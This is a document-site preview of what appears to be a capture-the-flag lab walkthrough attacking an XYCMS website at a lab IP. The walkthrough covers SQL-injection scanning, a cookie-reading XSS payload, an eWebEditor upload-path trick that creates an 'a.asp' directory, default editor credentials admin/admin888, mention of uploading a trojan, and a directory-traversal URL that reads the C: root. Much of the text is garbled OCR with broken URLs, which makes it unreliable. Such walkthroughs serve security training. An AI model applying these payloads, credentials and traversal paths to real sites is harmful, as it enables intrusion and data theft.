題目21:網(wǎng)站漏洞攻擊之XYCMS企業(yè)建站系統(tǒng)_第1頁(yè)
題目21:網(wǎng)站漏洞攻擊之XYCMS企業(yè)建站系統(tǒng)_第2頁(yè)
題目21:網(wǎng)站漏洞攻擊之XYCMS企業(yè)建站系統(tǒng)_第3頁(yè)
題目21:網(wǎng)站漏洞攻擊之XYCMS企業(yè)建站系統(tǒng)_第4頁(yè)
題目21:網(wǎng)站漏洞攻擊之XYCMS企業(yè)建站系統(tǒng)_第5頁(yè)
已閱讀5頁(yè),還剩9頁(yè)未讀 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

1、關(guān)卡二葉題目:網(wǎng)站漏洞攻擊之XYCM企業(yè)建站系統(tǒng)描述:公司搭建了門(mén)戶(hù)網(wǎng)站,使用了 XYCM企業(yè)建站系統(tǒng)。但是經(jīng)過(guò) 一段時(shí)間的運(yùn)營(yíng),發(fā)現(xiàn)公司網(wǎng)站經(jīng)常受到黑客的攻擊, 給公司 造成了很大的不便和損失。上級(jí)領(lǐng)導(dǎo)要求盡快查清原因,作為 網(wǎng)絡(luò)安全維護(hù)人員,請(qǐng)查找公司網(wǎng)站可能存在的一些漏洞至少 兩個(gè)。答案提交:1、請(qǐng)?zhí)峤猾@取的key值。參考步驟:1.進(jìn)入關(guān)卡二H一,點(diǎn)擊查看IP地址獲取靶機(jī)IP0關(guān)卡21弘 ,(本題60分)題目100 :網(wǎng)站漏洞攻擊之XYCM 5企業(yè)建站系統(tǒng)公司搭建了門(mén)戶(hù)網(wǎng)站.使用了巾匚峪企業(yè)建站系統(tǒng).但是經(jīng)過(guò)一般時(shí)間的運(yùn)營(yíng),發(fā)現(xiàn)公司網(wǎng)站經(jīng)常 受到黑客的攻擊,給公司造成了很大的不便和損失。

2、上級(jí)領(lǐng)導(dǎo)要求盡快查清原因,作為網(wǎng)絡(luò)安全 維護(hù)人員, 請(qǐng)查找公司網(wǎng)站的漏洞.并監(jiān)證此漏洞是否可以查看網(wǎng)站上的重要文件.提示!重要文件存放在C盤(pán)根目錄下.請(qǐng)以獲取到的內(nèi)容作為key值進(jìn)行提交。2.獲得的靶機(jī)IP地址3.打開(kāi)場(chǎng)景工具Window Xp滲透攻擊機(jī)4.進(jìn)入xp滲透攻擊機(jī),打開(kāi)瀏覽器瀏覽將要攻擊的網(wǎng)站壯匚ms企業(yè)建站系統(tǒng)物3歡迎您?同站踵碼開(kāi)發(fā)、篌板制作、頁(yè)面量計(jì)、網(wǎng)站tr首更學(xué)校資訊學(xué)校宜分 開(kāi)班信息 特調(diào)項(xiàng)目 箭資團(tuán)隊(duì)學(xué)員作品在線(xiàn)報(bào)名學(xué)才費(fèi)科172.16 1 62/dir url Spid=125.SQL注入使用“啊Dft入工具”對(duì)網(wǎng)站進(jìn)行漏洞測(cè)試注入檢惻檢測(cè)網(wǎng)址 http:/172

3、16 1.62/XYCMS企業(yè)建站系統(tǒng)VT. 3雙迎您,網(wǎng)站整碼開(kāi)發(fā).模板制作、掃描注入點(diǎn)管理入口檢測(cè)瀏覽網(wǎng)頁(yè)會(huì)員登陸躍教育http;/www. yuleroom. cn在在線(xiàn)購(gòu)買(mǎi)首頁(yè)學(xué)校限訊學(xué)校借介開(kāi)班信息培調(diào)項(xiàng)目拜賢團(tuán)以P搜索I可用注入點(diǎn)IQhttp:/LT2. 16. 1.62/ comm on. asp?i d-1 http:/1T2. 16. 1. B2/shcwnew. asp?id-Bl http:/1T2. 16.1,62/showgkk. asp?i4=4 http:/172 16. 1.52/showkUx. up?idt2 http:f/172.16.1, BE/show

4、team. aEp?id=35 http: /172. 16. 1.62/shcwpxxin. asp?id=24 http:/lT2. 16.1.62/showjcyip. asp?id.=35 http7/172. IB. 1, aS/ahowzsjz. up?iT hUp:/lT2,16. LBE/shwjyzd, isp?i9 http:/172. 16. 1L 62/ show download. asp?id=19D啊D注入工具v2. 32增強(qiáng)版 暗組技術(shù)論壇Http:/vw. darkst. coa相關(guān)工具設(shè)置連瓦關(guān)于繼續(xù)對(duì)注入點(diǎn)進(jìn)行SQ注入,但沒(méi)有發(fā)現(xiàn)可利用的信息,表明此處無(wú)漏

5、洞.XSSS洞禾I用(1)在留言本-留言標(biāo)題中插入xsS?本,window.alert(document.cookie);*濟(jì)西色膿:山茹博寫(xiě),姓名:整訪(fǎng)崎,方侵立樂(lè),網(wǎng)友不含必開(kāi)丹由信身場(chǎng)削崎H帥瀛同隊(duì)聯(lián)系電話(huà):方偎電謝瑯,網(wǎng)天不含心開(kāi)*聯(lián)系由詢(xún);必通耳,內(nèi)熱(L鎧原欣,悶更不會(huì)必開(kāi)KYCMS他業(yè)碰站系浣ASP+ACCESS+HTML是否齷L葉舌 是培艇承r可制罰不存卿ft界示I部前艮示*留莒內(nèi)容;性京*息三都更虧南京XYCM。瑚 www. yul 0 polif. Wk 返回帶有cookie的提示窗CfiE企業(yè)流站事虢V2. 3%即總:網(wǎng)砧費(fèi)碼開(kāi)發(fā)、機(jī)板制作、靠面設(shè)計(jì),網(wǎng)拈訂aS:加454

6、1cl493工加噩年拈嶷技讓建他叱有單Ip(r篇)3列褰.編輯器漏洞利用(1)利用編輯器漏洞進(jìn)行在網(wǎng)站上生產(chǎn)a.asp目錄http:2/admin/xyewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp C O 172.16. L 62/admin/KyeWebEditor/adjuin/upload. asp?action=saveAtype=imag, 1輕松上手 小編推薦應(yīng)用常用網(wǎng)站I二I從工E中導(dǎo)入Copyright 0 2003-2000 TLEdi tor net eTcnt All R

7、ights Ksservtdservieoft(2)編輯器管理界面的路徑默認(rèn): HYPERLINK 2/admin/xyeWebEditor/admin/login.asp 2/admin/xyeWebEditor/admin/login.asp在瀏覽器中打開(kāi)此地址iXTCMS企業(yè)建站系統(tǒng)VZ. 3蝴ebEditw在線(xiàn)編輯器-JG O 1724 16.1. 62/admin/xyeWebEdltor/adnln/login. asp。輕松上手片小編推薦應(yīng)用 口常用網(wǎng)站 口從工E中導(dǎo)入(3)輸入ewebeditor默認(rèn)用戶(hù)名admin密碼admin88瞪錄管理如下:/ C Q 172.16.1.

8、 62/admin/xyeWebEditor/admin/default aspe輕松上手r小編推薦應(yīng)用i常用網(wǎng)站口從工e中導(dǎo)入T想讓Google Chrome瀏覽器保存您的密碼嗎?保存密碼| 此網(wǎng)站一律不保存密碼當(dāng)前位置;后告管理首頁(yè)版權(quán)所有:主頁(yè)地址;聯(lián)系方式;eIebEditr 5 5版枳、富用聯(lián)系方法、技術(shù)支普*WebEditar Versi on 5. 5 for ASF 簡(jiǎn)體中文商業(yè)版已獲得國(guó)嘉版權(quán)局加發(fā)的討算機(jī)軟忤著作權(quán)登記證書(shū),登記號(hào):狗。4EMS549NebEditor中文站w*w. eWebEditor. net客服中心 Qeryi ci. cWqbEdi tor. iu電

9、話(huà)傳真:口591 畤3633593典;569800 郵短件支服務(wù)器名-172. 16. 1.62服務(wù)器工P :HE. 16, 1.62服務(wù)器端口二90服務(wù)卷時(shí)間:2014-11-19 0:45:34HS版本:Microso.ft-IIS/6. 0服翁器操作系統(tǒng):仙。數(shù)據(jù)對(duì)象:-i支米FSQ文本文件讀寫(xiě):4支手Strem文件流:支書(shū)Microsoft XMLHTTP ; J 支卜Microsoft. XHLDOH; 7 支主CD0NTS 虛擬SMTF發(fā) 信:然后就可以對(duì)樣式進(jìn)行管理上傳自己制作的木馬程序(4)編輯器默認(rèn)目錄遍歷地址: HYPERLINK 2/admi

10、n/xyeWebEditor/admin/upload.asp?id= 2/admin/xyeWebEditor/admin/upload.asp?id=1&d_viewmode=list&dir=./并在瀏覽器中打開(kāi)此地址 G O 172.16.1. 62; idiiin/xyeWebEditor/adjiiin/upload. asp?id=l&d viewode=listiL&輕松上手 f 小煽推薦應(yīng)用 常用網(wǎng)站 口從期中導(dǎo)入(5)利用編輯器默認(rèn)目錄遍歷漏洞 HYPERLINK 2/admin/xyeWebEditor/admin/upload.asp?id= 2/admin/xyeWebEditor/admin/upload.asp?id=1&dviewmode=list&dir=./././訪(fǎng)問(wèn)到C盤(pán)根目錄獲取的key口o*1日劊首頁(yè)上一頁(yè)共10個(gè)頁(yè)次:1/

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論